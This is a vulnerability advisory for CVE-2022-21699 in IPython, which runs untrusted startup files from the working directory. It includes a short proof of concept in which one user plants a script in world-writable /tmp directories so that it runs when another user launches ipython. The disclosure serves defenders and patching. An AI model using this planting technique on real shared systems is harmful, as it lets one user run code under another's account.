CVE-2022-21699: Execution with Unnecessary Privileges in ipython
(updated )
We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
Proof of concept
User1:
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
User2:
cd /tmp
ipython
User2 will see:
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
References
- github.com/advisories/GHSA-pq7m-3gw7-gq5x
- github.com/ipython/ipython
- github.com/ipython/ipython/commit/46a51ed69cdf41b4333943d9ceeb945c4ede5668
- github.com/ipython/ipython/commit/5fa1e409d2dc126c456510c16ece18e08b524e5b
- github.com/ipython/ipython/commit/67ca2b3aa9039438e6f80e3fccca556f26100b4d
- github.com/ipython/ipython/commit/a06ca837273271b4acb82c29be97c0b6d12a30ea
- github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x
- github.com/pypa/advisory-database/tree/main/vulns/ipython/PYSEC-2022-12.yaml
- ipython.readthedocs.io/en/stable/whatsnew/version8.html
- lists.debian.org/debian-lts-announce/2022/01/msg00021.html
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CRQRTWHYXMLDJ572VGVUZMUPEOTPM3KB
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZ7LVZBB4D7KVSFNEQUBEHFO3JW6D2ZK
- nvd.nist.gov/vuln/detail/CVE-2022-21699
Detect and mitigate CVE-2022-21699 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →